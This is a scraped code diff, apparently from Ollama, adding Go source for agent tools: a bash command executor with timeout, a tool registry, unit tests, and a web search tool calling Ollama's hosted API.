func showToolsStatus(registry *tools.Registry, approval *agent.ApprovalManager, supportsTools bool) {
|
||||||
|
if !supportsTools || registry == nil {
|
||||||
|
fmt.Println("Tools not available - model does not support tool calling")
|
||||||
|
fmt.Println()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
fmt.Println("Available tools:")
|
||||||
|
for _, name := range registry.Names() {
|
||||||
|
tool, _ := registry.Get(name)
|
||||||
|
fmt.Printf(" %s - %s\n", name, tool.Description())
|
||||||
|
}
|
||||||
|
|
||||||
|
allowed := approval.AllowedTools()
|
||||||
|
if len(allowed) > 0 {
|
||||||
|
fmt.Println("\nSession approvals:")
|
||||||
|
for _, key := range allowed {
|
||||||
|
fmt.Printf(" %s\n", key)
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
fmt.Println("\nNo tools approved for this session yet")
|
||||||
|
}
|
||||||
|
fmt.Println()
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,114 @@
|
||||||
|
package tools
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"os/exec"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/ollama/ollama/api"
|
||||||
|
)
|
||||||
|
|
||||||
|
const (
|
||||||
|
// bashTimeout is the maximum execution time for a command.
|
||||||
|
bashTimeout = 60 * time.Second
|
||||||
|
// maxOutputSize is the maximum output size in bytes.
|
||||||
|
maxOutputSize = 50000
|
||||||
|
)
|
||||||
|
|
||||||
|
// BashTool implements shell command execution.
|
||||||
|
type BashTool struct{}
|
||||||
|
|
||||||
|
// Name returns the tool name.
|
||||||
|
func (b *BashTool) Name() string {
|
||||||
|
return "bash"
|
||||||
|
}
|
||||||
|
|
||||||
|
// Description returns a description of the tool.
|
||||||
|
func (b *BashTool) Description() string {
|
||||||
|
return "Execute a bash command on the system. Use this to run shell commands, check files, run programs, etc."
|
||||||
|
}
|
||||||
|
|
||||||
|
// Schema returns the tool's parameter schema.
|
||||||
|
func (b *BashTool) Schema() api.ToolFunction {
|
||||||
|
props := api.NewToolPropertiesMap()
|
||||||
|
props.Set("command", api.ToolProperty{
|
||||||
|
Type: api.PropertyType{"string"},
|
||||||
|
Description: "The bash command to execute",
|
||||||
|
})
|
||||||
|
return api.ToolFunction{
|
||||||
|
Name: b.Name(),
|
||||||
|
Description: b.Description(),
|
||||||
|
Parameters: api.ToolFunctionParameters{
|
||||||
|
Type: "object",
|
||||||
|
Properties: props,
|
||||||
|
Required: []string{"command"},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Execute runs the bash command.
|
||||||
|
func (b *BashTool) Execute(args map[string]any) (string, error) {
|
||||||
|
command, ok := args["command"].(string)
|
||||||
|
if !ok || command == "" {
|
||||||
|
return "", fmt.Errorf("command parameter is required")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Create context with timeout
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), bashTimeout)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
// Execute command
|
||||||
|
cmd := exec.CommandContext(ctx, "bash", "-c", command)
|
||||||
|
|
||||||
|
var stdout, stderr bytes.Buffer
|
||||||
|
cmd.Stdout = &stdout
|
||||||
|
cmd.Stderr = &stderr
|
||||||
|
|
||||||
|
err := cmd.Run()
|
||||||
|
|
||||||
|
// Build output
|
||||||
|
var sb strings.Builder
|
||||||
|
|
||||||
|
// Add stdout
|
||||||
|
if stdout.Len() > 0 {
|
||||||
|
output := stdout.String()
|
||||||
|
if len(output) > maxOutputSize {
|
||||||
|
output = output[:maxOutputSize] + "\n... (output truncated)"
|
||||||
|
}
|
||||||
|
sb.WriteString(output)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Add stderr if present
|
||||||
|
if stderr.Len() > 0 {
|
||||||
|
stderrOutput := stderr.String()
|
||||||
|
if len(stderrOutput) > maxOutputSize {
|
||||||
|
stderrOutput = stderrOutput[:maxOutputSize] + "\n... (stderr truncated)"
|
||||||
|
}
|
||||||
|
if sb.Len() > 0 {
|
||||||
|
sb.WriteString("\n")
|
||||||
|
}
|
||||||
|
sb.WriteString("stderr:\n")
|
||||||
|
sb.WriteString(stderrOutput)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Handle errors
|
||||||
|
if err != nil {
|
||||||
|
if ctx.Err() == context.DeadlineExceeded {
|
||||||
|
return sb.String() + "\n\nError: command timed out after 60 seconds", nil
|
||||||
|
}
|
||||||
|
// Include exit code in output but don't return as error
|
||||||
|
if exitErr, ok := err.(*exec.ExitError); ok {
|
||||||
|
return sb.String() + fmt.Sprintf("\n\nExit code: %d", exitErr.ExitCode()), nil
|
||||||
|
}
|
||||||
|
return sb.String(), fmt.Errorf("executing command: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if sb.Len() == 0 {
|
||||||
|
return "(no output)", nil
|
||||||
|
}
|
||||||
|
|
||||||
|
return sb.String(), nil
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,96 @@
|
||||||
|
// Package tools provides built-in tool implementations for the agent loop.
|
||||||
|
package tools
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"sort"
|
||||||
|
|
||||||
|
"github.com/ollama/ollama/api"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Tool defines the interface for agent tools.
|
||||||
|
type Tool interface {
|
||||||
|
// Name returns the tool's unique identifier.
|
||||||
|
Name() string
|
||||||
|
// Description returns a human-readable description of what the tool does.
|
||||||
|
Description() string
|
||||||
|
// Schema returns the tool's parameter schema for the LLM.
|
||||||
|
Schema() api.ToolFunction
|
||||||
|
// Execute runs the tool with the given arguments.
|
||||||
|
Execute(args map[string]any) (string, error)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Registry manages available tools.
|
||||||
|
type Registry struct {
|
||||||
|
tools map[string]Tool
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewRegistry creates a new tool registry.
|
||||||
|
func NewRegistry() *Registry {
|
||||||
|
return &Registry{
|
||||||
|
tools: make(map[string]Tool),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Register adds a tool to the registry.
|
||||||
|
func (r *Registry) Register(tool Tool) {
|
||||||
|
r.tools[tool.Name()] = tool
|
||||||
|
}
|
||||||
|
|
||||||
|
// Get retrieves a tool by name.
|
||||||
|
func (r *Registry) Get(name string) (Tool, bool) {
|
||||||
|
tool, ok := r.tools[name]
|
||||||
|
return tool, ok
|
||||||
|
}
|
||||||
|
|
||||||
|
// Tools returns all registered tools in Ollama API format, sorted by name.
|
||||||
|
func (r *Registry) Tools() api.Tools {
|
||||||
|
// Get sorted names for deterministic ordering
|
||||||
|
names := make([]string, 0, len(r.tools))
|
||||||
|
for name := range r.tools {
|
||||||
|
names = append(names, name)
|
||||||
|
}
|
||||||
|
sort.Strings(names)
|
||||||
|
|
||||||
|
var tools api.Tools
|
||||||
|
for _, name := range names {
|
||||||
|
tool := r.tools[name]
|
||||||
|
tools = append(tools, api.Tool{
|
||||||
|
Type: "function",
|
||||||
|
Function: tool.Schema(),
|
||||||
|
})
|
||||||
|
}
|
||||||
|
return tools
|
||||||
|
}
|
||||||
|
|
||||||
|
// Execute runs a tool call and returns the result.
|
||||||
|
func (r *Registry) Execute(call api.ToolCall) (string, error) {
|
||||||
|
tool, ok := r.tools[call.Function.Name]
|
||||||
|
if !ok {
|
||||||
|
return "", fmt.Errorf("unknown tool: %s", call.Function.Name)
|
||||||
|
}
|
||||||
|
return tool.Execute(call.Function.Arguments.ToMap())
|
||||||
|
}
|
||||||
|
|
||||||
|
// Names returns the names of all registered tools, sorted alphabetically.
|
||||||
|
func (r *Registry) Names() []string {
|
||||||
|
names := make([]string, 0, len(r.tools))
|
||||||
|
for name := range r.tools {
|
||||||
|
names = append(names, name)
|
||||||
|
}
|
||||||
|
sort.Strings(names)
|
||||||
|
return names
|
||||||
|
}
|
||||||
|
|
||||||
|
// Count returns the number of registered tools.
|
||||||
|
func (r *Registry) Count() int {
|
||||||
|
return len(r.tools)
|
||||||
|
}
|
||||||
|
|
||||||
|
// DefaultRegistry creates a registry with all built-in tools.
|
||||||
|
func DefaultRegistry() *Registry {
|
||||||
|
r := NewRegistry()
|
||||||
|
r.Register(&WebSearchTool{})
|
||||||
|
r.Register(&BashTool{})
|
||||||
|
return r
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,143 @@
|
||||||
|
package tools
|
||||||
|
|
||||||
|
import (
|
||||||
|
"testing"
|
||||||
|
|
||||||
|
"github.com/ollama/ollama/api"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestRegistry_Register(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
|
||||||
|
r.Register(&BashTool{})
|
||||||
|
r.Register(&WebSearchTool{})
|
||||||
|
|
||||||
|
if r.Count() != 2 {
|
||||||
|
t.Errorf("expected 2 tools, got %d", r.Count())
|
||||||
|
}
|
||||||
|
|
||||||
|
names := r.Names()
|
||||||
|
if len(names) != 2 {
|
||||||
|
t.Errorf("expected 2 names, got %d", len(names))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistry_Get(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
r.Register(&BashTool{})
|
||||||
|
|
||||||
|
tool, ok := r.Get("bash")
|
||||||
|
if !ok {
|
||||||
|
t.Fatal("expected to find bash tool")
|
||||||
|
}
|
||||||
|
|
||||||
|
if tool.Name() != "bash" {
|
||||||
|
t.Errorf("expected name 'bash', got '%s'", tool.Name())
|
||||||
|
}
|
||||||
|
|
||||||
|
_, ok = r.Get("nonexistent")
|
||||||
|
if ok {
|
||||||
|
t.Error("expected not to find nonexistent tool")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistry_Tools(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
r.Register(&BashTool{})
|
||||||
|
r.Register(&WebSearchTool{})
|
||||||
|
|
||||||
|
tools := r.Tools()
|
||||||
|
if len(tools) != 2 {
|
||||||
|
t.Errorf("expected 2 tools, got %d", len(tools))
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tool := range tools {
|
||||||
|
if tool.Type != "function" {
|
||||||
|
t.Errorf("expected type 'function', got '%s'", tool.Type)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistry_Execute(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
r.Register(&BashTool{})
|
||||||
|
|
||||||
|
// Test successful execution
|
||||||
|
args := api.NewToolCallFunctionArguments()
|
||||||
|
args.Set("command", "echo hello")
|
||||||
|
result, err := r.Execute(api.ToolCall{
|
||||||
|
Function: api.ToolCallFunction{
|
||||||
|
Name: "bash",
|
||||||
|
Arguments: args,
|
||||||
|
},
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("unexpected error: %v", err)
|
||||||
|
}
|
||||||
|
if result != "hello\n" {
|
||||||
|
t.Errorf("expected 'hello\\n', got '%s'", result)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Test unknown tool
|
||||||
|
_, err = r.Execute(api.ToolCall{
|
||||||
|
Function: api.ToolCallFunction{
|
||||||
|
Name: "unknown",
|
||||||
|
Arguments: api.NewToolCallFunctionArguments(),
|
||||||
|
},
|
||||||
|
})
|
||||||
|
if err == nil {
|
||||||
|
t.Error("expected error for unknown tool")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestDefaultRegistry(t *testing.T) {
|
||||||
|
r := DefaultRegistry()
|
||||||
|
|
||||||
|
if r.Count() != 2 {
|
||||||
|
t.Errorf("expected 2 tools in default registry, got %d", r.Count())
|
||||||
|
}
|
||||||
|
|
||||||
|
_, ok := r.Get("bash")
|
||||||
|
if !ok {
|
||||||
|
t.Error("expected bash tool in default registry")
|
||||||
|
}
|
||||||
|
|
||||||
|
_, ok = r.Get("web_search")
|
||||||
|
if !ok {
|
||||||
|
t.Error("expected web_search tool in default registry")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBashTool_Schema(t *testing.T) {
|
||||||
|
tool := &BashTool{}
|
||||||
|
|
||||||
|
schema := tool.Schema()
|
||||||
|
if schema.Name != "bash" {
|
||||||
|
t.Errorf("expected name 'bash', got '%s'", schema.Name)
|
||||||
|
}
|
||||||
|
|
||||||
|
if schema.Parameters.Type != "object" {
|
||||||
|
t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
|
||||||
|
}
|
||||||
|
|
||||||
|
if _, ok := schema.Parameters.Properties.Get("command"); !ok {
|
||||||
|
t.Error("expected 'command' property in schema")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestWebSearchTool_Schema(t *testing.T) {
|
||||||
|
tool := &WebSearchTool{}
|
||||||
|
|
||||||
|
schema := tool.Schema()
|
||||||
|
if schema.Name != "web_search" {
|
||||||
|
t.Errorf("expected name 'web_search', got '%s'", schema.Name)
|
||||||
|
}
|
||||||
|
|
||||||
|
if schema.Parameters.Type != "object" {
|
||||||
|
t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
|
||||||
|
}
|
||||||
|
|
||||||
|
if _, ok := schema.Parameters.Properties.Get("query"); !ok {
|
||||||
|
t.Error("expected 'query' property in schema")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
@ -0,0 +1,148 @@
|
||||||
|
package tools
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"encoding/json"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"net/http"
|
||||||
|
"os"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/ollama/ollama/api"
|
||||||
|
)
|
||||||
|
|
||||||
|
const (
|
||||||
|
webSearchAPI = "https://ollama.com/api/web_search"
|
||||||
|
webSearchTimeout = 15 * time.Second
|
||||||
|
)
|
||||||
|
|
||||||
|
// WebSearchTool implements web search using Ollama's hosted API.
|
||||||
|
type WebSearchTool struct{}
|
||||||
|
|
||||||
|
// Name returns the tool name.
|
||||||
|
func (w *WebSearchTool) Name() string {
|
||||||
|
return "web_search"
|
||||||
|
}
|
||||||
|
|
||||||
|
// Description returns a description of the tool.
|
||||||
|
func (w *WebSearchTool) Description() string {
|
||||||
|
return "Search the web for current information. Use this when you need up-to-date information that may not be in your training data."
|
||||||
|
}
|
||||||
|
|
||||||
|
// Schema returns the tool's parameter schema.
|
||||||
|
func (w *WebSearchTool) Schema() api.ToolFunction {
|
||||||
|
props := api.NewToolPropertiesMap()
|
||||||
|
props.Set("query", api.ToolProperty{
|
||||||
|
Type: api.PropertyType{"string"},
|
||||||
|
Description: "The search query to look up on the web",
|
||||||
|
})
|
||||||
|
return api.ToolFunction{
|
||||||
|
Name: w.Name(),
|
||||||
|
Description: w.Description(),
|
||||||
|
Parameters: api.ToolFunctionParameters{
|
||||||
|
Type: "object",
|
||||||
|
Properties: props,
|
||||||
|
Required: []string{"query"},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// webSearchRequest is the request body for the web search API.
|
||||||
|
type webSearchRequest struct {
|
||||||
|
Query string `json:"query"`
|
||||||
|
MaxResults int `json:"max_results,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// webSearchResponse is the response from the web search API.
|
||||||
|
type webSearchResponse struct {
|
||||||
|
Results []webSearchResult `json:"results"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// webSearchResult is a single search result.
|
||||||
|
type webSearchResult struct {
|
||||||
|
Title string `json:"title"`
|
||||||
|
URL string `json:"url"`
|
||||||
|
Content string `json:"content"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// Execute performs the web search.
|
||||||
|
func (w *WebSearchTool) Execute(args map[string]any) (string, error) {
|
||||||
|
query, ok := args["query"].(string)
|
||||||
|
if !ok || query == "" {
|
||||||
|
return "", fmt.Errorf("query parameter is required")
|
||||||
|
}
|
||||||
|
|
||||||
|
apiKey := os.Getenv("OLLAMA_API_KEY")
|
||||||
|
if apiKey == "" {
|
||||||
|
return "", fmt.Errorf("OLLAMA_API_KEY environment variable is required for web search")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Prepare request
|
||||||
|
reqBody := webSearchRequest{
|
||||||
|
Query: query,
|
||||||
|
MaxResults: 5,
|
||||||
|
}
|
||||||
|
|
||||||
|
jsonBody, err := json.Marshal(reqBody)
|
||||||
|
if err != nil {
|
||||||
|
return "", fmt.Errorf("marshaling request: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
req, err := http.NewRequest("POST", webSearchAPI, bytes.NewBuffer(jsonBody))
|
||||||
|
if err != nil {
|
||||||
|
return "", fmt.Errorf("creating request: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
req.Header.Set("Content-Type", "application/json")
|
||||||
|
req.Header.Set("Authorization", "Bearer "+apiKey)
|
||||||
|
|
||||||
|
// Send request
|
||||||
|
client := &http.Client{Timeout: webSearchTimeout}
|
||||||
|
resp, err := client.Do(req)
|
||||||
|
if err != nil {
|
||||||
|
return "", fmt.Errorf("sending request: %w", err)
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
body, err := io.ReadAll(resp.Body)
|
||||||
|
if err != nil {
|
||||||
|
return "", fmt.Errorf("reading response: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if resp.StatusCode != http.StatusOK {
|
||||||
|
return "", fmt.Errorf("web search API returned status %d: %s", resp.StatusCode, string(body))
|
||||||
|
}
|
||||||
|
|
||||||
|
// Parse response
|
||||||
|
var searchResp webSearchResponse
|
||||||
|
if err := json.Unmarshal(body, &searchResp); err != nil {
|
||||||
|
return "", fmt.Errorf("parsing response: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Format results
|
||||||
|
if len(searchResp.Results) == 0 {
|
||||||
|
return "No results found for query: " + query, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
var sb strings.Builder
|
||||||
|
sb.WriteString(fmt.Sprintf("Search results for: %s\n\n", query))
|
||||||
|
|
||||||
|
for i, result := range searchResp.Results {
|
||||||
|
sb.WriteString(fmt.Sprintf("%d. %s\n", i+1, result.Title))
|
||||||
|
sb.WriteString(fmt.Sprintf(" URL: %s\n", result.URL))
|
||||||
|
if result.Content != "" {
|
||||||
|
// Truncate long content (UTF-8 safe)
|
||||||
|
content := result.Content
|
||||||
|
runes := []rune(content)
|
||||||
|
if len(runes) > 300 {
|
||||||
|
content = string(runes[:300]) + "..."
|
||||||
|
}
|
||||||
|
sb.WriteString(fmt.Sprintf(" %s\n", content))
|
||||||
|
}
|
||||||
|
sb.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
return sb.String(), nil
|
||||||
|
}
|
||||||
Loading…
Reference in New Issue